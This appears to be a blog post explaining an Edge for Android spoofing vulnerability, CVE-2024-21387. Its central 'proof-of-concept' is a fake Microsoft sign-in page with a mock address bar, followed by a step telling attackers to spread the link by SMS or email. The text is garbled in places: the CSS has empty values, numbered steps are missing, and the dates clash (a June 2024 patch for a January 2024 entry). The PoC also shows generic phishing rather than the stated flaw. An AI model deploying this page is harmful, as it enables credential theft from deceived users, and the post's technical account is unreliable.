CVE-2024-21387 - Microsoft Edge for Android Spoofing Vulnerability Explained

In the fast-changing world of cybersecurity, mobile browsers are quickly becoming prime targets for attackers. One of the latest threats goes by the name CVE-2024-21387. This vulnerability affects Microsoft Edge on Android devices and opens the door for attackers to carry out security spoofing attacks—putting your private data and online security at risk. In this post, we’ll break down what CVE-2024-21387 is, how it works, and what you need to do to stay safe. We’ll keep it simple and easy to understand, so you don't have to be a tech expert to get the essentials.

What is CVE-2024-21387?

CVE-2024-21387 is a spoofing vulnerability discovered in Microsoft Edge on Android. Spoofing attacks trick users into thinking they’re seeing or interacting with something trustworthy (like a real login page or a trusted website) when, in fact, it’s an attacker’s fake version. If you fall for the trick, attackers could steal your data, such as passwords, or get you to download malware.

Microsoft listed this vulnerability in their official security update guide:
🔗 Microsoft Security Update Guide - CVE-2024-21387

How Does the Vulnerability Work?

This vulnerability exists because Microsoft Edge for Android doesn’t properly validate parts of a website’s content or URL. An attacker could create a specially-crafted webpage that, when opened in Edge, displays a fake URL, hides the real web address, or shows trusted visual elements from a website (like logos) while loading their own malicious content.

For a simple analogy, imagine you get a letter in the mail that *looks* like it’s from your bank, right down to the official envelope and logo. But when you look closer, you realize it’s a clever fake designed to steal your account details. That’s what this spoof allows attackers to do—digitally.

Proof-of-Concept (PoC) Code

To help understand how this exploit works, here’s a simplified code snippet of a spoofing web page that could fool Microsoft Edge on Android:

<!-- Save as spoof.html and open in Edge for Android -->
<!DOCTYPE html>
<html>
<head>
    <title>Microsoft Account</title>
    <style>
        body {
            font-family: 'Segoe UI', Arial, sans-serif;
            margin: ; padding: ;
            background-color: #f3f3f3;
        }
        .header {
            background-color: #2F2F2F;
            color: #fff;
            padding: 12px 20px;
        }
        .url-bar {
            background-color: #f8f8f8;
            color: #039be5;
            padding: 6px 20px;
            font-size: 16px;
        }
        .container {
            margin: 32px auto;
            max-width: 350px;
            background: white;
            padding: 28px;
            box-shadow:   8px rgba(,,,.12);
            border-radius: 8px;
        }
    </style>
</head>
<body>
    <div class="header">Microsoft Edge</div>
    <div class="url-bar">https://login.microsoft.com</div>;
    <div class="container">
        <h3>Sign in</h3>
        <form>
            <input type="text" placeholder="Email or phone" required>


            <input type="password" placeholder="Password" required>


            <button type="submit">Next</button>
        </form>
    </div>
</body>
</html>

Note: The url-bar at the top is *not* the real browser address bar. But a victim might believe they're at login.microsoft.com!

Why does this work?
Microsoft Edge for Android—with this vulnerability—might not properly alert the user that they're seeing content that simulates the real Edge UI and address bar, allowing such a fake page to fool users.

Share a link via SMS, email, or instant message encouraging the user to click.

3. When opened in Microsoft Edge for Android, the victim sees a webpage that *looks* like a genuine Microsoft login page, complete with a fake address bar—a realistic spoof.

Microsoft Security Update Guide:

CVE-2024-21387

NIST National Vulnerability Database entry:

NVD - CVE-2024-21387

Microsoft Patch Tuesday, June 2024 Overview:

BleepingComputer coverage

Update Microsoft Edge:

Microsoft has released patches for this vulnerability. Go to Google Play Store and make sure Microsoft Edge is updated to the latest version.

Check the Real Address Bar:

On mobile, it’s easy to get fooled by fake elements on a web page. Always look for the browser’s actual address bar, not the page itself.

Be Wary of Links:

Don’t click on unexpected links in emails, texts, or messaging apps—especially if they request login details or personal info.

Conclusion

CVE-2024-21387 is a reminder that mobile browsers can be just as vulnerable as desktop ones. Spoofing flaws like this one are especially dangerous because they rely on fooling you, the user. Your best defense is to keep your apps updated and stay vigilant about which sites you trust—especially when entering passwords or sensitive data.

Stay safe, and spread the word!

*For exclusive updates and more simple security explanations, consider bookmarking this page or following reliable vulnerability trackers like MSRC and NVD.*

Timeline

Published on: 01/26/2024 01:15:10 UTC
Last modified on: 01/31/2024 20:08:28 UTC